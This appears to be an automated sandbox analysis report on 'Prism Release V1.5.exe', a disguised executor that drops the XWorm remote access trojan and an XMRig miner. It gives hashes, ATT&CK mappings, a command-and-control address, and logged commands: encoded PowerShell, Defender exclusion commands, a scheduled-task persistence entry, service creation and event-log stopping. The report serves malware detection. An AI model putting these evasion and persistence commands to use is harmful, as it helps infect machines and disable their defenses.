xmrig | 1f4fbb86e1e513b8bed2fa7a011d094e9f4dbb213e7ae8c34693c6f5343442c3

Resubmissions

15/06/2024, 13:17

240615-qjcprswbjp 10

15/06/2024, 13:11

240615-qe95gavhrr 10

15/06/2024, 13:08

240615-qdjwws1hjh 10

Analysis

max time kernel
51s
max time network
53s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
15/06/2024, 13:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Prism Release/Prism Release V1.5.exe
Size

5.1MB
MD5

ac80f970a7ae1c07663abdd11d752d34
SHA1

5ee4c0de86dc91aebb47f3ea6b7e624e861fdfad
SHA256

b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001
SHA512

7bd6150976477bec27532e7d7449e8a1ee6997b41359f3b31e2da8db0602f1ac0dfae171d8ebe00a0e18c2c77c7f9e4ed18352f7d8cf76c1cff855166ed6f94b
SSDEEP

98304:crjAG8empOd+SyaREAaOeaD5lWsjvi+ffzwZZHUzItLqbn82rh:3ppcNJQkjvi+ffzwZZJiR1

Score

10^/10

xmrig xworm evasion execution miner persistence rat trojan upx

Malware Config

Extracted

Family

xworm

91.92.241.69:5555

Attributes

Install_directory
%ProgramData%
install_file
Windows Runtime.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000c000000013f2c-5.dat	family_xworm
behavioral3/memory/2524-38-0x0000000000900000-0x000000000091A000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral3/memory/328-1932-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/328-1936-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/328-1930-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/328-1935-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/328-1934-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/328-1933-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/328-1929-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/328-1937-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/328-1938-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2244	powershell.exe
2844	powershell.exe
3380	powershell.exe
3464	powershell.exe
2240	powershell.exe
2512	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk	dllhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk	dllhost.exe

Executes dropped EXE 6 IoCs

pid	Process
2524	dllhost.exe
2672	Prism Executor.exe
2512	nexusloader.exe
3756	qhpmdi.exe
480	Process not Found
3980	kanilzbpgdul.exe

Loads dropped DLL 7 IoCs

pid	Process
2004	Prism Release V1.5.exe
2004	Prism Release V1.5.exe
2672	Prism Executor.exe
2512	nexusloader.exe
2524	dllhost.exe
2524	dllhost.exe
480	Process not Found

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/memory/328-1924-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1928-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1932-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1936-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1930-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1927-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1935-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1934-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1933-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1929-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1926-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1925-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1937-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/328-1938-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe"	dllhost.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3980 set thread context of 4032	3980	kanilzbpgdul.exe	68
PID 3980 set thread context of 328	3980	kanilzbpgdul.exe	73

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3944	sc.exe
3936	sc.exe
3824	sc.exe
3896	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3556	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2524	dllhost.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
2240	powershell.exe
2512	powershell.exe
2244	powershell.exe
2844	powershell.exe
3380	powershell.exe
3464	powershell.exe
2524	dllhost.exe
3756	qhpmdi.exe
3756	qhpmdi.exe
3756	qhpmdi.exe
3756	qhpmdi.exe
3756	qhpmdi.exe
3756	qhpmdi.exe
3756	qhpmdi.exe
3756	qhpmdi.exe
3980	kanilzbpgdul.exe
3980	kanilzbpgdul.exe
3980	kanilzbpgdul.exe
3980	kanilzbpgdul.exe
3980	kanilzbpgdul.exe
3980	kanilzbpgdul.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe
328	svchost.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	2512	powershell.exe
Token: SeDebugPrivilege	2524	dllhost.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	2524	dllhost.exe
Token: SeShutdownPrivilege	3792	powercfg.exe
Token: SeShutdownPrivilege	3808	powercfg.exe
Token: SeShutdownPrivilege	3800	powercfg.exe
Token: SeShutdownPrivilege	3816	powercfg.exe
Token: SeShutdownPrivilege	4016	powercfg.exe
Token: SeShutdownPrivilege	4000	powercfg.exe
Token: SeShutdownPrivilege	4008	powercfg.exe
Token: SeShutdownPrivilege	4024	powercfg.exe
Token: SeLockMemoryPrivilege	328	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2524	dllhost.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 2240	2004	Prism Release V1.5.exe	28
PID 2004 wrote to memory of 2240	2004	Prism Release V1.5.exe	28
PID 2004 wrote to memory of 2240	2004	Prism Release V1.5.exe	28
PID 2004 wrote to memory of 2240	2004	Prism Release V1.5.exe	28
PID 2004 wrote to memory of 2512	2004	Prism Release V1.5.exe	30
PID 2004 wrote to memory of 2512	2004	Prism Release V1.5.exe	30
PID 2004 wrote to memory of 2512	2004	Prism Release V1.5.exe	30
PID 2004 wrote to memory of 2512	2004	Prism Release V1.5.exe	30
PID 2004 wrote to memory of 2524	2004	Prism Release V1.5.exe	32
PID 2004 wrote to memory of 2524	2004	Prism Release V1.5.exe	32
PID 2004 wrote to memory of 2524	2004	Prism Release V1.5.exe	32
PID 2004 wrote to memory of 2524	2004	Prism Release V1.5.exe	32
PID 2004 wrote to memory of 2672	2004	Prism Release V1.5.exe	33
PID 2004 wrote to memory of 2672	2004	Prism Release V1.5.exe	33
PID 2004 wrote to memory of 2672	2004	Prism Release V1.5.exe	33
PID 2004 wrote to memory of 2672	2004	Prism Release V1.5.exe	33
PID 2672 wrote to memory of 2512	2672	Prism Executor.exe	34
PID 2672 wrote to memory of 2512	2672	Prism Executor.exe	34
PID 2672 wrote to memory of 2512	2672	Prism Executor.exe	34
PID 2524 wrote to memory of 2244	2524	dllhost.exe	36
PID 2524 wrote to memory of 2244	2524	dllhost.exe	36
PID 2524 wrote to memory of 2244	2524	dllhost.exe	36
PID 2524 wrote to memory of 2844	2524	dllhost.exe	38
PID 2524 wrote to memory of 2844	2524	dllhost.exe	38
PID 2524 wrote to memory of 2844	2524	dllhost.exe	38
PID 2524 wrote to memory of 3380	2524	dllhost.exe	40
PID 2524 wrote to memory of 3380	2524	dllhost.exe	40
PID 2524 wrote to memory of 3380	2524	dllhost.exe	40
PID 2524 wrote to memory of 3464	2524	dllhost.exe	42
PID 2524 wrote to memory of 3464	2524	dllhost.exe	42
PID 2524 wrote to memory of 3464	2524	dllhost.exe	42
PID 2524 wrote to memory of 3556	2524	dllhost.exe	44
PID 2524 wrote to memory of 3556	2524	dllhost.exe	44
PID 2524 wrote to memory of 3556	2524	dllhost.exe	44
PID 2524 wrote to memory of 3756	2524	dllhost.exe	46
PID 2524 wrote to memory of 3756	2524	dllhost.exe	46
PID 2524 wrote to memory of 3756	2524	dllhost.exe	46
PID 3980 wrote to memory of 4032	3980	kanilzbpgdul.exe	68
PID 3980 wrote to memory of 4032	3980	kanilzbpgdul.exe	68
PID 3980 wrote to memory of 4032	3980	kanilzbpgdul.exe	68
PID 3980 wrote to memory of 4032	3980	kanilzbpgdul.exe	68
PID 3980 wrote to memory of 4032	3980	kanilzbpgdul.exe	68
PID 3980 wrote to memory of 4032	3980	kanilzbpgdul.exe	68
PID 3980 wrote to memory of 4032	3980	kanilzbpgdul.exe	68
PID 3980 wrote to memory of 4032	3980	kanilzbpgdul.exe	68
PID 3980 wrote to memory of 4032	3980	kanilzbpgdul.exe	68
PID 3980 wrote to memory of 328	3980	kanilzbpgdul.exe	73
PID 3980 wrote to memory of 328	3980	kanilzbpgdul.exe	73
PID 3980 wrote to memory of 328	3980	kanilzbpgdul.exe	73
PID 3980 wrote to memory of 328	3980	kanilzbpgdul.exe	73
PID 3980 wrote to memory of 328	3980	kanilzbpgdul.exe	73

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.5.exe
"C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.5.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2240
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2512
- C:\Users\Admin\dllhost.exe
  "C:\Users\Admin\dllhost.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2244
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3464
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3556
- - C:\Users\Admin\AppData\Local\Temp\qhpmdi.exe
    "C:\Users\Admin\AppData\Local\Temp\qhpmdi.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3756
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3792
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3800
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3808
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3816
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "HDNFMUHS"
      4⤵
      Launches sc.exe
      PID:3824
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "HDNFMUHS" binpath= "C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:3896
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:3936
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "HDNFMUHS"
      4⤵
      Launches sc.exe
      PID:3944
- C:\Users\Admin\Prism Executor.exe
  "C:\Users\Admin\Prism Executor.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2672
- - C:\Users\Admin\AppData\Local\Temp\onefile_2672_133629305336566000\nexusloader.exe
    "C:\Users\Admin\Prism Executor.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2512

C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe
C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3980
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4000
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4008
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4016
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4024
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4032
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\onefile_2672_133629305336566000\python310.dll

Filesize
4.2MB

MD5
384349987b60775d6fc3a6d202c3e1bd

SHA1
701cb80c55f859ad4a31c53aa744a00d61e467e5

SHA256
f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

SHA512
6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\qhpmdi.exe

Filesize
2.5MB

MD5
1994ad04639f3d12c7bbfa37feb3434f

SHA1
4979247e5a9771286a91827851527e5dbfb80c8e

SHA256
c75f76cf5b34b4a165ad5705ae5229f67fc081d958239bf0faea58e6c342301c

SHA512
adc4eb990fc6721a0a39cf9832f133bde025a31b3ecd4d84e076d8c454b40dd043f1f045f6f989febf2478999a190d116a58192c49d8b878414490e7ce451b43

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
754696b79fd9f7603c5377de570695f7

SHA1
22a79a8c8f577bd91cd4e7d4e7b66aea71c51f5d

SHA256
87548c2e7d5da10dd92f101f5308d17da0b7b1fd80b53fd0d53724292ddfd1d5

SHA512
645404ed7fe97d2d4eee4c753b45a4f0d39ca36c18a67e2d4bde32bf3db7fcbab3c4172900b5807cf1d5355868c08ac16e8c70c35c8b4356e1051aa86c8f0234

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fb7f942836c93f6b14e88d21679244ec

SHA1
55252ec7de960dd864c31b96d8cd3b2380d4891e

SHA256
e44d272c56371c1e4dbc59a6b479791eafb0e1d813a2cb493820b260b7ad13a9

SHA512
79118dcbc837afd84b4a6104cc8a89294d2d57bacad99386e5afae4f05e3c1cd5dcef9cab2f5fc23b8612969f787944bdad402f42e8b684ee99f57c8b93ec579

Download Submit
C:\Users\Admin\dllhost.exe

Filesize
78KB

MD5
4a7f75343aaa5a4d8d18add50ccf3139

SHA1
110c62eee6d7deb4aa9d601c942eae43482d2125

SHA256
34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e

SHA512
1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

Download Submit
\Users\Admin\AppData\Local\Temp\onefile_2672_133629305336566000\nexusloader.exe

Filesize
3.5MB

MD5
58545dc488990ac11872079d119f8284

SHA1
dade5c16834d582a5187041697cc5a7c2eae2f88

SHA256
6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc

SHA512
93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7

Download Submit
\Users\Admin\Prism Executor.exe

Filesize
5.0MB

MD5
fa819e23d8fee4ea89aaaea55e0b28f5

SHA1
18335d4e0d140dcab66c7197c57f669251898ce5

SHA256
bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c

SHA512
e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d

Download Submit
memory/328-1935-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1932-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1938-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1937-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1925-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1926-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1924-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1929-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1933-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1934-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1928-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1931-0x0000000000130000-0x0000000000150000-memory.dmp

Filesize
128KB

Download
memory/328-1936-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1930-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/328-1927-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2244-955-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2244-954-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/2524-38-0x0000000000900000-0x000000000091A000-memory.dmp

Filesize
104KB

Download
memory/4032-1915-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4032-1916-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4032-1921-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4032-1917-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4032-1918-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4032-1919-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download